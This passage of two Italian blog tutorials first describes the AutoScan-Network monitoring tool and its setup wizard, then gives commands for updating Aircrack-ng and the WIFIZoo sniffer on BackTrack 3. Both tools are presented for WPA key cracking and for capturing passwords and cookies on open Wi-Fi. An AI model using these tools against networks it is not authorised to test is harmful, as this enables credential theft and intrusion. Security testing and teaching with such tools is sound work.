–>riconoscimento automatico dei vari dispositivi; è possibile aggiungere nel database , dispositivi che il tool non riconosce;
–>lo schema della scansione della rete può essere salvato in un file XML;
–>riconoscimento di vari intrusioni nella rete , (in “intruders detection mode” tutti i nuovi dispositivi aggiunti saranno considerati intrusi);
–>esplorazione del file sharing;
–>client telnet;
–>client nessus;
–>funzione “wake on” su lan;
–>non sono richiesti privilegi di root;

[COME SI PRESENTA]

L’applicazione è composta principalmente da due parti:

–> Una parte grafica che stampa i risultati e dà l’accesso all’operatore a tutte le funzionalità.
–> La parte che scansiona la rete e supervisiona i dispositivi

L’interfaccia grafica è in grado di connettere uno o più agents , (in locale o remoto) , per supervisionare contemporaneamente più reti remote , (viene impiegato un agent per ogni rete supervisionata).

[PER AGGIUNGERE NUOVE RETI]

Nella prima pagina del wizard è possibile inserire una nuova rete o riprendere la configurazione di una rete già salvata.
Creazione di una nuova rete:
-Mettere innanzitutto la spunta su “new“;
-Immettere il nome della rete nel campo apposito (siate sicuri di avere nomi differenti per ognuna delle reti da supervisionare);
-scegliere un’icona per la propria rete , tenendo in considerazione le icone adatte al tipo do rete.
-Nel campo “Private subnet” ci sono le varie reti private che in seguito saranno scansionate con Autoscan (lasciare le impostazioni di default);
-nel campo più in basso scegliere il nome dell’SNMP (se siete indecisi
lasciate quello di default);
-L’opzione riguardante “Dynamic IP” informa l’agent di
prendersi cura di eventuali cambi di IP (è quindi consigliabile
lasciare la spunta).
Per quanto riguarda invece l’utilizzo di una rete già creata in
precedenza:
-Mettete la spunta su “restore” invece che su “new”;
-Aprite il file XML salvato della vostra rete.

Nella pagina successiva si può scegliere quale rete si vuole scansionare.
-Mettete la spunta su “localhost” se state effettuando la scansione
mediante “l’agent” locale;
-Mettete invece la spunta a “connect to host” se volete connettere la
vostra macchina ad un agent remoto, in questo caso aggiungete le
informazioni nei vari campi per connettervi alla macchina remota in
cui vi sarà in esecuzione ‘autoscan-network-daemon’.

***

***

Nella terza pagina si potrà scegliere l’interfaccia di rete,
e in caso voi stiate eseguendo autoscan su una macchina remota, è proprio
durante questo passaggio che la vostra macchina scambia
informazioni con quella remota, in seguito a questa operazione
potrete scegliere l’interfaccia di rete

***

***

L’ultima pagina è soltanto un sommario dei dati inseriti dunque
cliccate su avanti.

Se volete inserire una ulteriore rete basta che clicchiate su
“add a network” e si avvierà di nuovo un wizard come quello precedente..

COME AGISCE: Autoscan scansiona permanentemente la rete , cercando nuovi dispositivi. Quando ne viene inserito uno, Autoscan identifica il dispositivo e il modello (alcuni tra i dispositivi compatibili sono: notepad,desktop, servers, switch, router, video games, telefoni su IP, telecamere di sorveglianza, fax…..) L’identificazione di un dispositivo è basata sul riconoscimento di pacchetti, infatti ogni tipo di dispositivo ha una propria caratteristica nei pacchetti e Autoscan esegue un fingerprint confrontando i dati del dispositivo con quelli contenuti nel suo database. I dispositivi che non vengono riconosciuti vengono immessi in una lista separata. L’utente dunque può aggiungere al database i propri dispositivi non riconosciuti cliccando sul dispositivo non riconosciuto e seguendo l’apposito wizard. L’utente può addirittura aggiungere icone all’interno del tool , basta che copi i file desiderati in:
/opt/AutoScan/usr/share/pixmaps/autoscan-network/Equipment/

Questo per fare in modo che tutti coloro che hanno da monitorare più reti e diverse tra loro possano facilmente conraddistinguerle.

[L'INTERFACCIA]
Durante l’analisi della rete, i dispositivi sono rappresentati nella parte sinistra della finestra. Cliccando su uno di questi dispositivi, si visualizzano le informazioni relative al dispositivo stesso e precisamente queste informazioni vengono visualizzate nella parte destra dello schermo.
Le informazioni visualizzate riguardano:

IP Address
MAC Address
marca modello e chipset del network adapter
Open ports

ed altre informazioni a carattere personale , (in cui ognuno può mettere le informazioni che vuole ad es. email, proprio nome…..).

Nella maggior parte dei casi vengono anche individuati i servizi che ascoltano sulle porte indicate, e viene riportato uno schema grafico nella finestra di destra, sotto quella con le informazioni.
La barra situata nell’angolo sinistro ci mostra la progressione della scansione in corso, inoltre essa ci mostra:

-Il numero dei dispositivi trovati;
-Il numero dei dispositivi analizzati;
-Il numero dei dispositivi che saranno scansionati;
-Percentuale della scansione corrente visualizzata nella barra di progressione.

Lo schema della nostra rete può essere visualizzato in due modi; è possibile cambiare la visualizzazione cliccando con il tasto destro del mouse sulla lista dei dispositivi.

Questi sono solo alcuni screenshot che mostrano come Autoscan monitorizzi due reti diverse , quella sul mio laptop e quella sul mio Server , dove nel primo caso ho inserito l’intrusion detection , essendo in BackTrack e non avendo ancora creato il mio secondo utente , mentre sul server è in esecuzione come monitor di rete dei servizi che vedete tramite le icone.

questi screenshot mostrano la possibilita , con un account Nessus , di testare eventualmente la rete, possibile anche comunicare tramite il protocolo Telnet ed usufruire di tool come nMap e Ping per controllare appunto le porte in modo rapido ed efficace.

Dalla penultima immagine potete vedere come io stia monitorando senza alcun intervento il mio laptop , il mio server e tutta la subnet ad esso collegata…

Dall’ultimo screenshot invece potete vedere come AutoScan , sempre tenendo conto di una configurazione della subnet adeguata , o come in questo caso di una possibilità di comunicazione con il server principale , ci dia la possibilità di connetterci utilizzando i tool gia presenti nel sistema , in questo caso la nostra BackTrack , che avendo Konqueror e Firefox di prima installazione , ci permette di accedere a Fpt con gli stessi tool , facendo apparire un’ opzione al passaggio del mouse.

Bene , questo è tutto , abbiamo fatto , almeno lo speriamo , una sufficiente descrizione di un ottimo programma , che permette a tutti coloro che devono garantirsi una certa sicurezza di tenere sotto controllo la prorpia rete , monitorandola con AutoScan , saremo avvertiti in tempo reale di tutto ciò di cui abbiamo bisogno.

Per riprendere il discorso dell’inizio tutorial e dell’uso in BackTrack di AutoScan come Firewall , aggiungo anche che usando AutoScan insieme a KsysGuard configurato per il network-monitoring , si ottiene un’ottima soluzione che è una barriera davvero potente e considerando l’azione che svolgono anche non invadente.

Fonte: Carlito Brigante Blog

questo breve tutorial spiega come aggiornare alle versioni più recenti 2 tool in vostro possesso con l’utilizzo di BackTrack 3:

• la suite di tools Aircrack-NG
• lo sniffer WIFIZoo

[#][#]Aircrack-NG
L’attuale versione installata in BT3 di Aircrack-ng è la 1.0-beta1; noi in questo tutorial vedremo come passare dalla 1.0-beta1 alla 1.0-beta2 lasciando inalterato il supporto per SQLite, cosi da poter ancora utilizzare Airolib-ng per la creazione di database. Tra le varie novità proposte dalla versione 1.0-beta2 si può notare con piacere che gli sviluppatori di questo magnifico tool hanno ridotto a 2 i pacchetti necessari al cracking della chiave WPA (prima occorreva catturare tutti e 4 i passaggi dell’handshake); comunque vi rimando alla pagina contente il changelog della versione 1.0-beta2 per dettagli più accurati sul lavoro svolto dagli sviluppatori di Aircrack-ng.
Vi ricordo che le informazioni su come aggiornare Aircrack-ng sono presenti anche sul suo wiki.
Prima di iniziare creiamo una directory dalla quale lavoreremo:

———
cd /root
mkdir update
cd update
———

ora scarichiamo con wget l’archivio contenente il codice di Aircrack-ng e scompattiamolo:

———
wget http://download.aircrack-ng.org/aircrack-ng-1.0-beta2.tar.gz
tar -zxvf aircrack-ng-1.0-beta2.tar.gz
———

Non ci rimane che entrare nella directory creata scompattando Aircrack-ng per compilarlo ed installarlo con il supporto per Airolib-ng:

———
cd aircrack-ng-1.0-beta2
make sqlite=true
make sqlite=true install
———

A questo punto abbiamo la versione 1.0-beta2 di Aircrack-ng compilata ed installata correttamente e funzionante!

[#][#]WIFIZoo
WIFIZoo è uno sniffer che lavora sul protocollo 802.11; è in grado di catturare e mostrare in tempo reale le informazioni pasanti sulle reti non protette come password POP, cookies etc.
La versione presente in BT3 è la 1.2, ma noi la aggiorneremo alla versione 1.3 che, a differenza della versione precedente, ha in più il supporto per leggere da un file del traffico catturato in precedenza (es. con Kismet o Airodump-ng).

Prima di tutto entriamo nella nostra cartella “update” se non ci siamo già:

———
cd /root/update
———

quindi scarichiamo la versione 1.3 di WIFIZoo:

———
wget http://community.corest.com/~hochoa/wifizoo/wifizoo_v1.3.tgz
———

sccompattiamo WIFIZoo e entriamo nella directory creata:

———
tar zxvf wifizoo_v1.3.tgz
cd wifizoo_v1.3
———

ora dobbiamo scaricare “scapy.py“, necessario al funzionamento del programma:

———
wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py
———

WIFIZoo è scritto in Python che è gia installato in BT3, dobbiamo solo configurarlo affinchè riconosca la nostra interfaccia di rete, lo stesso vale per “scapy.py“.
Apriamo con un editor di testo il file “wifizoo.py” e modifichiamo la voce “conf.iface = ‘rausb0′” (linea 50) in modo che rispecchi la nostra configurazione, esempio avendo una scheda con chipset Atheros la linea in va cambiata in “conf.iface = ‘ath0′“.
Adesso possiamo passare ad editare “scapy.py“, quindi apriamo il file con un editor testuale e modifichiamo la linea 13270 inserendo al posto di “betteriface” una riga simile a quella che inseriamo in Kismet nella voce source, usando un chipset Atheros io ho modificato la linea in modo che diventi “conf.iface = ‘madwifing_g,ath0,madwifi’“.

Adesso che WIFIZoo è configurato non ci resta che sostituirlo al precedente e creare al suo interno la directory dove verranno salvati i logs ad ogni suo utilizzo, quindi:

———
rm -r /pentest/wireless/wifizoo/*
cp -r * /pentest/wireless/wifizoo
mkdir /pentest/wireless/wifizoo/logs
———

Prima di testare WIFIZoo installeremo Graphviz, questo tool permetterà a WIFIZoo di creare dei grafici che mettano in relazione BSSID con i client ad essi associati:

———
wget http://www.graphviz.org/pub/graphviz/ARCHIVE/graphviz-working.tar.gz
tar zxvf graphviz-working.tar.gz
cd graphviz-2.16.1/
———

durante l’installazione ho avuto dei problemi con le librerie grafiche, cosi cercando sul forum di Remote-Exploit.org ho trovato la soluzione ai miei problemi seguendo il post di KMDave, in pratica dobbiamo creare un collegamente al file “gdkconfig.h” prima di procedere con la normale procedura di installazione da sorgenti, quindi:

———
ln -s /usr/lib/gtk-2.0/include/gdkconfig.h /usr/include
./configure
make
make install
———

A questo punto WIFIZoo è perfettamente funzionante, non dovete fare altro che recarvi dentro la directory di WIFIZoo e lanciarlo con:

———
python wifizoo.py -i atho
———

dove “ath0″ rappresenta la vostra interfaccia di rete settata in monitor mode.

Adesso che abbiamo finito il nostro lavoro eliminiamo la cartella “update” dalla nostra home:

———
cd /root
rm -r update
———

Fonte: Carlito Brigante Blog